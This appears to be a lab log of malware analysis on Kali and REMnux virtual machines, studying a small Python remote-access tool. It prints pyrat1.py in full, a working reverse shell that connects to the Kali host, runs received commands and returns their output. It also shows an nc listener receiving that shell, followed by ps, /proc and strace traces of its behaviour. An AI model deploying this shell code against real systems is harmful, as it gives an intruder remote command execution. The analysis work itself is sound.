# kali 192.168.159.128, remnux 192.168.159.129
#
remnux@remnux:~/temp$ cat pyrat1.py 
import os
import subprocess
import socket
import ssl

so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
so.connect(('192.168.159.128', 444))
#s = ssl.wrap_socket(so)  # python version <=3.7
s = so

xE = False
while not xE:
    data = s.recv(1024)
    if len(data) == 0:
        xE = True
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdout_value = proc.stdout.read() + proc.stderr.read()
    s.sendall(stdout_value)
remnux@remnux:~/temp$ 

# start wireshark on both Linux boxes
# start nc -lvnp 444 on kali

remnux@remnux:~/temp$ python2 pyrat1.py 


┌──(kali㉿kali)-[~]
└─$ nc -lvnp 444     
listening on [any] 444 ...
connect to [192.168.159.128] from (UNKNOWN) [192.168.159.129] 50444
id
uid=1000(remnux) gid=1000(remnux) groups=1000(remnux),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),133(wireshark)
whoami
remnux


remnux@remnux:~/temp$ ps ef
    PID TTY      STAT   TIME COMMAND
   3502 pts/1    Ss     0:00 bash SSH_AUTH_SOCK=/tmp/ssh-jveflQb6P6v8/agent.882 SESSION_MANAGER=local/remnux:@/tmp/.ICE-unix/980,unix/rem
   3530 pts/1    R+     0:00  \_ ps ef SHELL=/bin/bash SESSION_MANAGER=local/remnux:@/tmp/.ICE-unix/980,unix/remnux:/tmp/.ICE-unix/980 QT
   1398 pts/0    Ss     0:00 bash SSH_AUTH_SOCK=/tmp/ssh-jveflQb6P6v8/agent.882 SESSION_MANAGER=local/remnux:@/tmp/.ICE-unix/980,unix/rem
   3482 pts/0    S+     0:00  \_ python2 pyrat1.py SHELL=/bin/bash SESSION_MANAGER=local/remnux:@/tmp/.ICE-unix/980,unix/remnux:/tmp/.ICE
   3497 pts/0    Z+     0:00      \_ [sh] <defunct>
    841 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --system
    843 tty2     Sl+    0:20  \_ /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keept
    882 tty2     Sl+    0:00  \_ /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu USER=remnux XDG_SEAT=seat0 XDG_SE
remnux@remnux:~/temp$ 

remnux@remnux:~/temp$ sudo ls -l /proc/3482/fd
total 0
lrwx------ 1 remnux remnux 64 May 24 10:20 0 -> /dev/pts/0
lrwx------ 1 remnux remnux 64 May 24 10:20 1 -> /dev/pts/0
lr-x------ 1 remnux remnux 64 May 24 10:20 10 -> 'pipe:[114149]'
lrwx------ 1 remnux remnux 64 May 24 10:20 2 -> /dev/pts/0
lrwx------ 1 remnux remnux 64 May 24 10:20 3 -> 'socket:[111567]'
l-wx------ 1 remnux remnux 64 May 24 10:20 5 -> 'pipe:[114147]'
lr-x------ 1 remnux remnux 64 May 24 10:20 6 -> 'pipe:[114148]'
remnux@remnux:~/temp$ sudo ls -l /proc/3482/fd
total 0
lrwx------ 1 remnux remnux 64 May 24 10:20 0 -> /dev/pts/0
lrwx------ 1 remnux remnux 64 May 24 10:20 1 -> /dev/pts/0
lr-x------ 1 remnux remnux 64 May 24 10:22 11 -> 'pipe:[118877]'
lrwx------ 1 remnux remnux 64 May 24 10:20 2 -> /dev/pts/0
lrwx------ 1 remnux remnux 64 May 24 10:20 3 -> 'socket:[111567]'
l-wx------ 1 remnux remnux 64 May 24 10:22 7 -> 'pipe:[118875]'
lr-x------ 1 remnux remnux 64 May 24 10:22 8 -> 'pipe:[118876]'
remnux@remnux:~/temp$ 

remnux@remnux:~/temp$ sudo strace -p3482
strace: Process 3482 attached
recvfrom(3, "whoami\n", 1024, 0, NULL, NULL) = 7
pipe([4, 5])                            = 0
fcntl(4, F_GETFD)                       = 0
fcntl(4, F_SETFD, FD_CLOEXEC)           = 0
fcntl(5, F_GETFD)                       = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
pipe([6, 9])                            = 0
fcntl(6, F_GETFD)                       = 0
fcntl(6, F_SETFD, FD_CLOEXEC)           = 0
fcntl(9, F_GETFD)                       = 0
fcntl(9, F_SETFD, FD_CLOEXEC)           = 0
pipe([10, 12])                          = 0
fcntl(10, F_GETFD)                      = 0
fcntl(10, F_SETFD, FD_CLOEXEC)          = 0
fcntl(12, F_GETFD)                      = 0
fcntl(12, F_SETFD, FD_CLOEXEC)          = 0
pipe([13, 14])                          = 0
fcntl(13, F_GETFD)                      = 0
fcntl(13, F_SETFD, FD_CLOEXEC)          = 0
fcntl(14, F_GETFD)                      = 0
fcntl(14, F_SETFD, FD_CLOEXEC)          = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5e3925ca10) = 3630
close(14)                               = 0
read(13, "", 1048576)                   = 0
close(4)                                = 0
close(9)                                = 0
close(12)                               = 0
close(13)                               = 0
fstat(5, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(5, F_GETFL)                       = 0x1 (flags O_WRONLY)
fstat(6, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(6, F_GETFL)                       = 0 (flags O_RDONLY)
fstat(10, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(10, F_GETFL)                      = 0 (flags O_RDONLY)
wait4(3580, [{WIFEXITED(s) && WEXITSTATUS(s) == 255}], WNOHANG, NULL) = 3580
close(8)                                = 0
close(7)                                = 0
close(11)                               = 0
fstat(6, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(6, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(6, "remnux", 6)                    = 6
fstat(6, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(6, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(6, "\n", 6)                        = 1
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=3630, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
read(6, "", 5)                          = 0
fstat(10, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(10, 0, SEEK_CUR)                  = -1 ESPIPE (Illegal seek)
read(10, "", 6)                         = 0
sendto(3, "remnux\n", 7, 0, NULL, 0)    = 7


recvfrom(3, "id\n", 1024, 0, NULL, NULL) = 3
pipe([4, 7])                            = 0
fcntl(4, F_GETFD)                       = 0
fcntl(4, F_SETFD, FD_CLOEXEC)           = 0
fcntl(7, F_GETFD)                       = 0
fcntl(7, F_SETFD, FD_CLOEXEC)           = 0
pipe([8, 9])                            = 0
fcntl(8, F_GETFD)                       = 0
fcntl(8, F_SETFD, FD_CLOEXEC)           = 0
fcntl(9, F_GETFD)                       = 0
fcntl(9, F_SETFD, FD_CLOEXEC)           = 0
pipe([11, 12])                          = 0
fcntl(11, F_GETFD)                      = 0
fcntl(11, F_SETFD, FD_CLOEXEC)          = 0
fcntl(12, F_GETFD)                      = 0
fcntl(12, F_SETFD, FD_CLOEXEC)          = 0
pipe([13, 14])                          = 0
fcntl(13, F_GETFD)                      = 0
fcntl(13, F_SETFD, FD_CLOEXEC)          = 0
fcntl(14, F_GETFD)                      = 0
fcntl(14, F_SETFD, FD_CLOEXEC)          = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5e3925ca10) = 3645
close(14)                               = 0
read(13, "", 1048576)                   = 0
close(4)                                = 0
close(9)                                = 0
close(12)                               = 0
close(13)                               = 0
fstat(7, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(7, F_GETFL)                       = 0x1 (flags O_WRONLY)
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(8, F_GETFL)                       = 0 (flags O_RDONLY)
fstat(11, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
fcntl(11, F_GETFL)                      = 0 (flags O_RDONLY)
wait4(3630, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WNOHANG, NULL) = 3630
close(6)                                = 0
close(5)                                = 0
close(10)                               = 0
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "uid=10", 6)                    = 6
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=3645, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "00(rem", 6)                    = 6
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "nux) gi", 7)                   = 7
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "d=1000(r", 8)                  = 8
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "emnux) gr", 9)                 = 9
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "oups=1000(", 10)               = 10
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "remnux),4(a", 11)              = 11
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "dm),24(cdrom)", 13)            = 13
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, ",27(sudo),30(d", 14)           = 14
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "ip),46(plugdev),", 16)         = 16
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "114(lpadmin),115(s", 18)       = 18
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "ambashare),133(wires", 20)     = 20
fstat(8, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(8, 0, SEEK_CUR)                   = -1 ESPIPE (Illegal seek)
read(8, "hark)\n", 23)                  = 6
read(8, "", 17)                         = 0
fstat(11, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
lseek(11, 0, SEEK_CUR)                  = -1 ESPIPE (Illegal seek)
read(11, "", 6)                         = 0
sendto(3, "uid=1000(remnux) gid=1000(remnux"..., 144, 0, NULL, 0) = 144
recvfrom(3, 

# pid 3645, 3735 (shell=True)
remnux@remnux:/proc/3482/fd$ ps u
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
remnux       841  0.0  0.0 164020  6536 tty2     Ssl+ May23   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=
remnux       843  0.0  1.3 345096 109412 tty2    Sl+  May23   0:41 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthorit
remnux       882  0.0  0.1 188216 13624 tty2     Sl+  May23   0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
remnux      1398  0.0  0.0  11264  5632 pts/0    Ss   May23   0:00 bash
remnux      3482  0.0  0.1  21812 10380 pts/0    S+   09:48   0:00 python2 pyrat1.py
remnux      3502  0.0  0.0  11136  5368 pts/1    Ss   09:58   0:00 bash
remnux      3590  0.0  0.0  11136  5512 pts/2    Ss   10:26   0:00 bash
remnux      3645  0.0  0.0      0     0 pts/0    Z+   10:47   0:00 [sh] <defunct>
remnux      3734  0.0  0.0  11488  3272 pts/2    R+   11:13   0:00 ps u
remnux@remnux:/proc/3482/fd$ ps u
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
remnux       841  0.0  0.0 164020  6536 tty2     Ssl+ May23   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=
remnux       843  0.0  1.3 345096 109412 tty2    Sl+  May23   0:42 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthorit
remnux       882  0.0  0.1 188216 13624 tty2     Sl+  May23   0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
remnux      1398  0.0  0.0  11264  5632 pts/0    Ss   May23   0:00 bash
remnux      3482  0.0  0.1  21812 10380 pts/0    S+   09:48   0:00 python2 pyrat1.py
remnux      3502  0.0  0.0  11136  5368 pts/1    Ss   09:58   0:00 bash
remnux      3590  0.0  0.0  11136  5512 pts/2    Ss   10:26   0:00 bash
remnux      3735  0.0  0.0      0     0 pts/0    Z+   11:14   0:00 [sh] <defunct>
remnux      3737  0.0  0.0  11488  3240 pts/2    R+   11:14   0:00 ps u


